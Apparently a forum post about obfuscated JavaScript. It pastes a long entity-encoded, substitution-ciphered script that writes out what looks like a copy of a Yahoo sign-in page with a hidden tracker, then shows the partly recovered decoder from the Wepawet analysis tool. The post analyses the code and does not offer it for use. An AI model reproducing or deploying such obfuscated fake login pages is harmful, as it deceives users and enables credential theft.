&42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#108;&#111;&#103;&#105;&#110;&#45;&#111;&#97;&#117;&#116;&#104;&#50;&#45;&#121;&#97;&#104;&#111;&#111;&#45;&#106;&#97;&#112;&#97;&#110;&#45;&#109;&#115;&#103;\"&31;            &#89;&#97;&#104;&#111;&#111; &#74;&#97;&#112;&#97;&#110; &#117;&#115;&#101;&#114;&#115; &#45; &#112;&#108;&#101;&#97;&#115;&#101; &#118;&#105;&#115;&#105;&#116; &#89;&#97;&#104;&#111;&#111; &#72;&#101;&#108;&#112; &#116;&#111; &#108;&#101;&#97;&#114;&#110; &#104;&#111;&#119; &#116;&#111; &#97;&#100;&#100; &#121;&#111;&#117;&#114; &#101;&#109;&#97;&#105;&#108; &#97;&#100;&#100;&#114;&#101;&#115;&#115;&#46;        &51;\/&65;&41;&6;&31;    &51;\/&65;&41;&6;&31;    &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"&#104;&#105;&#100;&#100;&#101;&#110;\" &1;&50;&20;&13;&59;\"&27;&#116;&#115;\" &6;&50;&34;&58;&13;&59;\"&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#51;\" &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&#48;&#49;&#50;&27;&#50;&#54;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"5\"&31;    &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"&#104;&#105;&#100;&#100;&#101;&#110;\" &1;&50;&20;&13;&59;\"&27;&#116;&#112;&#97;\" &6;&50;&34;&58;&13;&59;\"\" &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&#48;&#49;&#50;&27;&#50;&#55;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"6\"&31;    &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"&#104;&#105;&#100;&#100;&#101;&#110;\" &1;&50;&20;&13;&59;\"&27;&#109;&#117;&#104;\" &6;&50;&34;&58;&13;&59;\"\" &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&#48;&#49;&#50;&27;&#50;&#56;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"7\"&31;    &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"&#104;&#105;&#100;&#100;&#101;&#110;\" &1;&50;&20;&13;&59;\"&27;&#99;&#114;&#117;&#109;&#98;\" &6;&50;&34;&58;&13;&59;\"&#105;&#84;&#70;&#117;&#69;&#116;&#103;&#121;&#46;&#114;&#71;\" &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&#48;&#49;&#50;&27;&#50;&#57;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"8\"&31;    &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"&#104;&#105;&#100;&#100;&#101;&#110;\" &1;&50;&20;&13;&59;\"&27;&#117;&#117;&#105;&#100;\" &6;&50;&34;&58;&13;&59;\"&#112;&#55;&#122;&#74;&#52;&#65;&#48;&#117;&#72;&#79;&#102;&#121;\" &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&#48;&#49;&#50;&27;&#51;&#48;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"9\"&31;    &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"&#104;&#105;&#100;&#100;&#101;&#110;\" &1;&50;&20;&13;&59;\"&27;&#115;&#101;&#113;&#105;&#100;\" &6;&50;&34;&58;&13;&59;\"&#50;\" &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&#48;&#49;&#50;&27;&#51;&#49;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"10\"&31;&51;&41;&20;&57; &37;&40;&42;&59;\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#104;&#111;&#115;&#46;&#97;&#109;&#117;&#110;&#103;&#46;&#117;&#115;&#47;&#115;&#119;&#105;&#100;&#103;&#101;&#116;&#47;&#112;&#117;&#108;&#101;&#110;&#116;&#97;&#115;&#117;&#46;&#112;&#110;&#103;\" &22;&41;&65;&16;&35;&59;0 &35;&13;&41;&57;&35;&16;&59;0 \/&31;    &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"&#104;&#105;&#100;&#100;&#101;&#110;\" &1;&50;&20;&13;&59;\"&#111;&#116;&#112;&27;&#99;&#104;&#97;&#110;&#110;&#101;&#108;\" &6;&50;&34;&58;&13;&59;\"\" &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&#48;&#49;&#50;&27;&#51;&#50;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"11\"&31;    &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"&#104;&#105;&#100;&#100;&#101;&#110;\" &1;&50;&20;&13;&59;\"&#111;&#116;&#112;&27;&#114;&#101;&#102;&27;&#99;&#99;&27;&#105;&#110;&#116;&#108;\" &6;&50;&34;&58;&13;&59;\"\" &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&#48;&#49;&#50;&27;&#51;&#51;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"12\"&31;&51;\/&8;&60;&40;&20;&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49; &#109;&#98;&#114;&#45;&#104;&#105;&#100;&#101;\"&31;    &51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#111;&#116;&#112;&#45;&#108;&#105;&#110;&#107;\"&31;        &51;&8;&60;&40;&20; &20;&13;&16;&35;&60;&65;&59;\"&#71;&#69;&#84;\" &50;&42;&16;&41;&60;&1;&59;\"\" &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#102;&#111;&#114;&#109; &#109;&#98;&#114;&#45;&#109;&#98;&#45;&#108;&#111;&#103;&#105;&#110;&#45;&#102;&#114;&#109;\" &1;&60;&6;&50;&34;&41;&65;&50;&16;&13;&59;\"\"&31;            &51;&41;&1;&32;&58;&16; &16;&25;&32;&13;&59;\"&#104;&#105;&#100;&#100;&#101;&#110;\" &1;&50;&20;&13;&59;\"&#46;&#111;&#116;&#112;\" &6;&50;&34;&58;&13;&59;\"&#121;\" &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#49;&#53;&#48;&#49;&#50;&27;&#51;&#52;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"13\"&31;            &51;&33;&58;&16;&16;&60;&1; &41;&65;&59;\"&#108;&#111;&#103;&#105;&#110;&#45;&#111;&#116;&#112;\" &16;&25;&32;&13;&59;\"&#115;&#117;&#98;&#109;&#105;&#116;\" &42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#98;&#117;&#116;&#116;&#111;&#110;&#45;&#116;&#101;&#120;&#116;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"14\"&31;&#77;&#66;&#82;&27;&#79;&#84;&#80;&27;&#83;&#73;&#71;&#78;&#73;&#78;&27;&#85;&#83;&#73;&#78;&#71;&27;&#77;&#79;&#66;&#73;&#76;&#69;&27;&#78;&#85;&#77;&#66;&#69;&#82;&51;\/&33;&58;&16;&16;&60;&1;&31;        &51;\/&8;&60;&40;&20;&31;    &51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;&37;&42;&40;&41;&32;&16;&31;    &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&60;&16;&32;&27;&13;&1;&50;&33;&34;&13;&65; &59; &8;&50;&34;&37;&13;;    &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&60;&16;&32;&27;&60;&32;&16;&41;&1; &59; &16;&40;&58;&13;;    &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&37;&16;&40;&41;&1;&57;&37; &59; &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&37;&16;&40;&41;&1;&57;&37; || &61;        &32;&34;&50;&42;&13;&35;&60;&34;&65;&13;&40;&27;&20;&60;&33;&41;&34;&13;&27;&1;&58;&20;&33;&13;&40;: \"&14;&60;&33;&41;&34;&13; &1;&58;&20;&33;&13;&40;\",        &32;&34;&50;&42;&13;&35;&60;&34;&65;&13;&40;&27;&58;&37;&13;&40;&1;&50;&20;&13; : \"&11;&20;&50;&41;&34; &50;&65;&65;&40;&13;&37;&37;\",        &37;&41;&57;&1;&27;&41;&1;: \"&23;&41;&57;&1; &54;&1;\",        &57;&13;&16;&27;&20;&25;&27;&32;&50;&37;&37;&22;&65;: \"&17;&60;&1;&16;&41;&1;&58;&13;\",        &37;&41;&57;&1;&41;&1;&27;&42;&60;&1;&16;&41;&1;&58;&13;: \"&17;&60;&1;&16;&41;&1;&58;&13;\",        &60;&65;&32;&27;&32;&50;&37;&37;&22;&60;&40;&65;&27;&65;&13;&37;&42;: \"&44;&50;&32; &42;&60;&1;&16;&41;&1;&58;&13; &16;&60; &40;&13;&42;&13;&41;&6;&13; &50;&1; &60;&1;&46;&65;&13;&20;&50;&1;&65; &32;&50;&37;&37;&22;&60;&40;&65;.\",        &60;&65;&32;&27;&32;&58;&37;&35;&27;&65;&13;&37;&42;: \"&44;&50;&32; &42;&60;&1;&16;&41;&1;&58;&13; &16;&60; &58;&37;&13; &28;&42;&42;&60;&58;&1;&16; &52;&13;&25;.\",        &13;&40;&40;&60;&40;&27;&58;&37;&13;&40;&1;&50;&20;&13;&27;&32;&50;&37;&37;&22;&65;: \"&54;&1;&6;&50;&34;&41;&65; &58;&37;&13;&40;&1;&50;&20;&13;\/&32;&50;&37;&37;&22;&60;&40;&65;. &18;&34;&13;&50;&37;&13; &16;&40;&25; &50;&57;&50;&41;&1;.\",        &13;&40;&40;&60;&40;&27;&41;&1;&6;&50;&34;&41;&65;&27;&32;&50;&37;&37;&22;&65;: \"&44;&35;&50;&16; &65;&41;&65;&1;\u2019&16; &22;&60;&40;&26;. &18;&34;&13;&50;&37;&13; &16;&25;&32;&13; &25;&60;&58;&40; &60;&1;&46;&65;&13;&20;&50;&1;&65; &32;&50;&37;&37;&22;&60;&40;&65; &50;&57;&50;&41;&1;.\",        &13;&40;&40;&60;&40;&27;&13;&20;&32;&16;&25;&27;&32;&50;&37;&37;&22;&65;: \"&38;&60;&58;&40; &60;&1;&46;&65;&13;&20;&50;&1;&65; &32;&50;&37;&37;&22;&60;&40;&65; &41;&37; &40;&13;&0;&58;&41;&40;&13;&65;.\",        &60;&16;&32;&27;&40;&13;&16;&40;&25;&27;&20;&13;&37;&37;&50;&57;&13;: \"&18;&34;&13;&50;&37;&13; &22;&50;&41;&16; &61;0&62; &37;&13;&42;&60;&1;&65;&37; &33;&13;&8;&60;&40;&13; &16;&40;&25;&41;&1;&57; &16;&60; &40;&13;&37;&13;&1;&65;.\",        &60;&16;&32;&27;&40;&13;&16;&40;&25;&27;&20;&13;&37;&37;&50;&57;&13;&27;&60;&1;&13;: \"&18;&34;&13;&50;&37;&13; &22;&50;&41;&16; &50; &37;&13;&42;&60;&1;&65; &33;&13;&8;&60;&40;&13; &16;&40;&25;&41;&1;&57; &16;&60; &40;&13;&37;&13;&1;&65;.\",        &13;&1;&65;&27;&60;&8;&27;&37;&16;&40;&41;&1;&57;: \"&11;&47;&23;\"    &62;;    &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&42;&34;&41;&42;&26;&27;&16;&60;&27;&65;&41;&37;&20;&41;&37;&37;&27;&37;&32;&41;&1;&1;&13;&40;&27;&34;&60;&57;&41;&1; &59; 1;    &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&42;&34;&41;&42;&26;&27;&16;&60;&27;&65;&41;&37;&20;&41;&37;&37;&27;&37;&32;&41;&1;&1;&13;&40;&27;&42;&50;&32;&16;&42;&35;&50; &59; 1;    &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&41;&37;&27;&50;&37;&65;&26; &59; 0;    &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&58;&37;&13;&27;&60;&65;&32;&27;&58;&37;&13;&40;&1;&50;&20;&13;&27;&20;&60;&1;&41;&16;&60;&40; &59; &8;&50;&34;&37;&13;;    &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&41;&37;&27;&60;&50;&58;&16;&35;2 &59; &8;&50;&34;&37;&13;;&14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&60;&50;&58;&16;&35;2&27;&25;&50;&35;&60;&60;&27;&10;&50;&32;&50;&1;&27;&40;&13;&65;&41;&40;&13;&42;&16;&27;&58;&40;&34; &59; \"&35;&16;&16;&32;:\/\/&22;&22;&22;.&25;&50;&35;&60;&60;&46;&35;&13;&34;&32;.&10;&32;\/&50;&32;&32;\/&50;&1;&37;&22;&13;&40;&37;\/&65;&13;&16;&50;&41;&34;\/&32;\/565\/&50;&27;&41;&65;\/47713?&37;&60;&42;&27;&37;&40;&42;&59;&20;&50;&41;&34;&&37;&60;&42;&27;&16;&40;&26;&59;&20;&50;\";    &51;\/&37;&42;&40;&41;&32;&16;&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#102;&#111;&#114;&#103;&#111;&#116;&#112;&#119;&#100; \" &41;&65;&59;\"&#121;&#117;&#105;&27;&#51;&27;&#49;&#56;&27;&#49;&27;&#55;&27;&#49;&#52;&#52;&#51;&#53;&#54;&#52;&#51;&#51;&#50;&#55;&#49;&#48;&27;&#57;&#54;\"&31;&51;&50; &41;&65;&59;\"&#109;&#98;&#114;&#45;&#102;&#111;&#114;&#103;&#111;&#116;&#45;&#108;&#105;&#110;&#107;\" &35;&40;&13;&8;&59;\"&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#101;&#100;&#105;&#116;&#46;&#121;&#97;&#104;&#111;&#111;&#46;&#99;&#111;&#109;&#47;&#99;&#111;&#110;&#102;&#105;&#103;&#47;&#101;&#118;&#97;&#108;&27;&#102;&#111;&#114;&#103;&#111;&#116;&27;&#112;&#119;&#63;&#108;&#97;&#110;&#103;&#61;&#101;&#110;&#45;&#85;&#83;&#38;&#105;&#110;&#116;&#108;&#61;&#117;&#115;&#38;&#100;&#111;&#110;&#101;&#61;&#104;&#116;&#116;&#112;&#115;&#37;&#51;&#65;&#37;&#50;&#70;&#37;&#50;&#70;&#117;&#115;&#46;&#121;&#97;&#104;&#111;&#111;&#46;&#99;&#111;&#109;&#37;&#50;&#70;&#37;&#51;&#70;&#112;&#37;&#51;&#68;&#117;&#115;&#38;&#115;&#114;&#99;&#61;&#102;&#112;&#99;&#116;&#120;\" &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49;\" &40;&60;&34;&13;&59;\"&33;&58;&16;&16;&60;&1;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&37;&34;&26;&59;\"&40;&13;&42;&60;&6;&13;&40;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"15\"&31;&#67;&#97;&#110;&#39;&#116; &#97;&#99;&#99;&#101;&#115;&#115; &#121;&#111;&#117;&#114; &#97;&#99;&#99;&#111;&#117;&#110;&#116;&#63;&51;\/&50;&31;&51;\/&65;&41;&6;&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#109;&#98;&#45;&#99;&#114;&#101;&#97;&#116;&#101;&#97;&#99;&#99; &#112;&#117;&#114;&#101;&#45;&#102;&#111;&#114;&#109;&#45;&#115;&#116;&#97;&#99;&#107;&#101;&#100; &#109;&#98;&#114;&#45;&#116;&#101;&#120;&#116;&#45;&#49;&#51; &#104;&#97;&#115;&#45;&#100;&#101;&#118;&#105;&#99;&#101;&#45;&#115;&#119;&#105;&#116;&#99;&#104;&#101;&#114;\"&31;&51;&37;&32;&50;&1;&31;&#78;&#101;&#119; &#116;&#111; &#89;&#97;&#104;&#111;&#111;&#63;&51;\/&37;&32;&50;&1;&31;&51;&33;&58;&16;&16;&60;&1; &41;&65;&59;\"&#99;&#114;&#101;&#97;&#116;&#101;&#97;&#99;&#99;\" &40;&13;&57;&58;&40;&34;&59;\"&35;&16;&16;&32;&37;:\/\/&13;&65;&41;&16;.&25;&50;&35;&60;&60;.&42;&60;&20;\/&40;&13;&57;&41;&37;&16;&40;&50;&16;&41;&60;&1;?.&34;&50;&1;&57;&59;&13;&1;&46;&2;&23;&&50;&20;&32;;.&41;&1;&16;&34;&59;&58;&37;&&50;&20;&32;;.&37;&40;&42;&59;&8;&32;&42;&16;&3;&&50;&20;&32;;.&50;&37;&65;&26;&27;&13;&20;&33;&13;&65;&65;&13;&65;&59;0&&50;&20;&32;;.&65;&60;&1;&13;&59;&35;&16;&16;&32;&37;%3&28;%2&5;%2&5;&58;&37;.&25;&50;&35;&60;&60;.&42;&60;&20;%2&5;%3&5;&32;%3&63;&58;&37;\" &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#98;&#117;&#116;&#116;&#111;&#110; &#109;&#98;&#114;&#45;&#98;&#117;&#116;&#116;&#111;&#110;&#45;&#116;&#101;&#120;&#116;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&37;&34;&26;&59;\"&37;&41;&57;&1;&58;&32;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"16\"&31;&#83;&#105;&#103;&#110; &#117;&#112; &#102;&#111;&#114; &#97; &#110;&#101;&#119; &#97;&#99;&#99;&#111;&#117;&#110;&#116;&51;\/&33;&58;&16;&16;&60;&1;&31;&51;\/&65;&41;&6;&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#109;&#98;&#114;&#45;&#100;&#115;&#45;&#99;&#111;&#110;&#116;&#97;&#105;&#110;&#101;&#114;\"&31;&51;&65;&41;&6; &41;&65;&59;\"&#109;&#98;&#114;&#45;&#100;&#115;\" &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49; &#109;&#98;&#114;&#45;&#109;&#98;&#45;&#100;&#115;\"&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#112;&#117;&#114;&#101;&#45;&#117;&#45;&#49; &#108;&#105;&#110;&#107;&#115;\"&31;&51;&50; &41;&65;&59;\"&#109;&#98;&#114;&#45;&#100;&#101;&#118;&#105;&#99;&#101;&#45;&#115;&#119;&#105;&#116;&#99;&#104;&#101;&#114;&#45;&#108;&#105;&#110;&#107;\" &35;&40;&13;&8;&59;\"&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#108;&#111;&#103;&#105;&#110;&#46;&#121;&#97;&#104;&#111;&#111;&#46;&#99;&#111;&#109;&#47;&#63;&#109;&#98;&#115;&#119;&#61;&#100;&#38;&#46;&#115;&#114;&#99;&#61;&#102;&#112;&#99;&#116;&#120;&#38;&#46;&#105;&#110;&#116;&#108;&#61;&#117;&#115;&#38;&#46;&#108;&#97;&#110;&#103;&#61;&#101;&#110;&#45;&#85;&#83;&#38;&#46;&#100;&#111;&#110;&#101;&#61;&#104;&#116;&#116;&#112;&#115;&#37;&#51;&#65;&#37;&#50;&#70;&#37;&#50;&#70;&#117;&#115;&#46;&#121;&#97;&#104;&#111;&#111;&#46;&#99;&#111;&#109;&#37;&#50;&#70;&#37;&#51;&#70;&#112;&#37;&#51;&#68;&#117;&#115;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"17\"&31;&#86;&#105;&#101;&#119; &#100;&#101;&#115;&#107;&#116;&#111;&#112; &#118;&#101;&#114;&#115;&#105;&#111;&#110;&51;\/&50;&31;&51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;\/&20;&50;&41;&1;&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#115;&#112;&#105;&#110;&#45;&#109;&#97;&#115;&#107;\"&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#99;&#101;&#110;&#116;&#101;&#114;\"&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"&#115;&#105;&#103;&#110;&#45;&#105;&#110;&#45;&#115;&#112;&#105;&#110;&#110;&#101;&#114;\"&31;&51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;&37;&42;&40;&41;&32;&16; &37;&40;&42;&59;\"&#47;&#121;&#104;&#109;&#118;&27;&#102;&#105;&#108;&#101;&#115;&#47;&#99;&#111;&#109;&#98;&#111;&#49;&#46;&#99;&#115;&#115;\"&31;&51;\/&37;&42;&40;&41;&32;&16;&31;&51;&65;&41;&6; &41;&65;&59;\"&#121;&#117;&#105;&#51;&#45;&#99;&#115;&#115;&#45;&#115;&#116;&#97;&#109;&#112;\" &37;&16;&25;&34;&13;&59;\"&32;&60;&37;&41;&16;&41;&60;&1;: &50;&33;&37;&60;&34;&58;&16;&13; &49;&41;&20;&32;&60;&40;&16;&50;&1;&16;; &6;&41;&37;&41;&33;&41;&34;&41;&16;&25;: &35;&41;&65;&65;&13;&1; &49;&41;&20;&32;&60;&40;&16;&50;&1;&16;\"&31;&51;\/&65;&41;&6;&31;&51;&65;&41;&6; &41;&65;&59;\"&#121;&#117;&#105;&#51;&#45;&#99;&#115;&#115;&#45;&#115;&#116;&#97;&#109;&#112;\" &37;&16;&25;&34;&13;&59;\"&32;&60;&37;&41;&16;&41;&60;&1;: &50;&33;&37;&60;&34;&58;&16;&13; &49;&41;&20;&32;&60;&40;&16;&50;&1;&16;; &6;&41;&37;&41;&33;&41;&34;&41;&16;&25;: &35;&41;&65;&65;&13;&1; &49;&41;&20;&32;&60;&40;&16;&50;&1;&16;\"&31;&51;\/&65;&41;&6;&31;&51;&37;&42;&40;&41;&32;&16;&31;    &38;&2;&54;&48;&15;.&58;&37;&13;&48;'&1;&60;&65;&13;', '&13;&6;&13;&1;&16;', &8;&58;&1;&42;&16;&41;&60;&1; &48;&38;&15; &61;        &38;.&60;&1;&48;\"&65;&60;&20;&40;&13;&50;&65;&25;\", &8;&58;&1;&42;&16;&41;&60;&1;&48;&15; &61;            &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&42;&60;&20;&37;&42;&60;&40;&13;&27;&42;&60;&1;&8;&41;&57; &59; &45;&61;                &42;1: \"2\",                &42;2: \"7241469\",                &42;5: \"150002880\",                &42;7: \"&35;&16;&16;&32;&37;%3&28;%2&5;%2&5;&34;&60;&57;&41;&1;.&25;&50;&35;&60;&60;.&42;&60;&20;%2&5;&20;%3&5;.&37;&40;&42;%3&63;&8;&32;&42;&16;&3;%26.&41;&1;&16;&34;%3&63;&58;&37;%26.&34;&50;&1;&57;%3&63;&13;&1;&46;&2;&23;%26.&65;&60;&1;&13;%3&63;&35;&16;&16;&32;&37;%253&28;%252&5;%252&5;&58;&37;.&25;&50;&35;&60;&60;.&42;&60;&20;%252&5;%253&5;&32;%253&63;&58;&37;\",                &42;14: \"&46;1\"            &62;&67;;            &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&42;&60;&20;&37;&42;&60;&40;&13;&27;&33;&13;&50;&42;&60;&1;&48;&15;;        &62;&15;;    &62;&15;;&51;\/&37;&42;&40;&41;&32;&16;&31;&51;&1;&60;&37;&42;&40;&41;&32;&16;&31;  &&50;&20;&32;;&34;&16;;&41;&20;&57; &37;&40;&42;&59;\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#98;&#46;&#115;&#99;&#111;&#114;&#101;&#99;&#97;&#114;&#100;&#114;&#101;&#115;&#101;&#97;&#114;&#99;&#104;&#46;&#99;&#111;&#109;&#47;&#112;&#63;&#99;&#49;&#61;&#50;&#91;&#38;&#93;&#97;&#109;&#112;&#91;&#47;&#59;&#93;&#97;&#109;&#112;&#59;&#99;&#50;&#61;&#55;&#50;&#52;&#49;&#52;&#54;&#57;&#91;&#38;&#93;&#97;&#109;&#112;&#91;&#47;&#59;&#93;&#97;&#109;&#112;&#59;&#99;&#55;&#61;&#104;&#116;&#116;&#112;&#115;&#37;&#51;&#65;&#37;&#50;&#70;&#37;&#50;&#70;&#108;&#111;&#103;&#105;&#110;&#46;&#121;&#97;&#104;&#111;&#111;&#46;&#99;&#111;&#109;&#37;&#50;&#70;&#109;&#37;&#51;&#70;&#46;&#115;&#114;&#99;&#37;&#51;&#68;&#102;&#112;&#99;&#116;&#120;&#37;&#50;&#54;&#46;&#105;&#110;&#116;&#108;&#37;&#51;&#68;&#117;&#115;&#37;&#50;&#54;&#46;&#108;&#97;&#110;&#103;&#37;&#51;&#68;&#101;&#110;&#45;&#85;&#83;&#37;&#50;&#54;&#46;&#100;&#111;&#110;&#101;&#37;&#51;&#68;&#104;&#116;&#116;&#112;&#115;&#37;&#50;&#53;&#51;&#65;&#37;&#50;&#53;&#50;&#70;&#37;&#50;&#53;&#50;&#70;&#117;&#115;&#46;&#121;&#97;&#104;&#111;&#111;&#46;&#99;&#111;&#109;&#37;&#50;&#53;&#50;&#70;&#37;&#50;&#53;&#51;&#70;&#112;&#37;&#50;&#53;&#51;&#68;&#117;&#115;&#91;&#38;&#93;&#97;&#109;&#112;&#91;&#47;&#59;&#93;&#97;&#109;&#112;&#59;&#99;&#53;&#61;&#49;&#53;&#48;&#48;&#48;&#50;&#56;&#56;&#48;&#91;&#38;&#93;&#97;&#109;&#112;&#91;&#47;&#59;&#93;&#97;&#109;&#112;&#59;&#99;&#49;&#52;&#61;&#45;&#49;&#91;&#38;&#93;&#97;&#109;&#112;&#91;&#47;&#59;&#93;&#97;&#109;&#112;&#59;&#99;&#118;&#61;&#50;&#46;&#48;&#91;&#38;&#93;&#97;&#109;&#112;&#91;&#47;&#59;&#93;&#97;&#109;&#112;&#59;&#99;&#106;&#61;&#49;\"&&50;&20;&32;;&57;&16;;&51;\/&1;&60;&37;&42;&40;&41;&32;&16;&31;&51;&49;&46;&46; &37;&32;&50;&42;&13;&54;&65; &36;&50;&37;&13;: 150002880, &54;&1;&16;&34;: 150002880&46;&46;&31;&51;\/&33;&60;&65;&25;&31;&51;\/&35;&16;&20;&34;&31;",["&0;","&1;","&2;","&3;","&4;","&5;","&6;","&7;","&8;","&9;","&10;","&11;","&12;","&13;","&14;","&15;","&16;","&17;","&18;","&19;","&20;","&21;","&22;","&23;","&24;","&25;","&26;","&27;","&28;","&29;","&30;","&31;","&32;","&33;","&34;","&35;","&36;","&37;","&38;","&39;","&40;","&41;","&42;","&43;","&44;","&45;","&46;","&47;","&48;","&49;","&50;","&51;","&52;","&53;","&54;","&55;","&56;","&57;","&58;","&59;","&60;","&61;","&62;","&63;","&64;","&65;","&66;","&67;"],["q","n","U","x","@","F","v","H","f","W","j","E","R","e","M",")","t","C","P","z","m","Z","w","S","N","y","k","_","A","Q","L",">","p","b","l","h","B","s","Y","~","r","i","c","*","T","[","-","O","(","!","a","<","K","V","I","G","+","g","u","=","o","{","}","D","J","d","X","]"]));</script>

I have used a tool called "Wepawet" to decipher obfuscated code before; in this case however, Wepawet is only partially able to decipher things:

unescape = function (a7e7757b1e12abcb736ab9a754ffb617a, ac0e190d8267e36708f955d7ab048990d, 
acaf1a3dfb505ffed0d024130f58c5cfa){
  ae0c641195b27425bb056ac56f8953d24 = a7e7757b1e12abcb736ab9a754ffb617a;
  for (a46922a0880a8f11f8f69cbb52b1396be = 0; a46922a0880a8f11f8f69cbb52b1396be < 
  ac0e190d8267e36708f955d7ab048990d.length; a46922a0880a8f11f8f69cbb52b1396be ++ ){
    ae0c641195b27425bb056ac56f8953d24 = ae0c641195b27425bb056ac56f8953d24.replace(new 
    RegExp(ac0e190d8267e36708f955d7ab048990d[a46922a0880a8f11f8f69cbb52b1396be], "g"), 
    acaf1a3dfb505ffed0d024130f58c5cfa[a46922a0880a8f11f8f69cbb52b1396be]);
  }
  ae0c641195b27425bb056ac56f8953d24 = ae0c641195b27425bb056ac56f8953d24.replace(new RegExp
  ("%26", "g"), "&");
  ae0c641195b27425bb056ac56f8953d24 = ae0c641195b27425bb056ac56f8953d24.replace(new RegExp
  ("%3B", "g"), ";");
  document.write(ae0c641195b27425bb056ac56f8953d24.replace('<!--?--><?', '<!--?-->'));
  a7e7757b1e12abcb736ab9a754ffb617a = "";
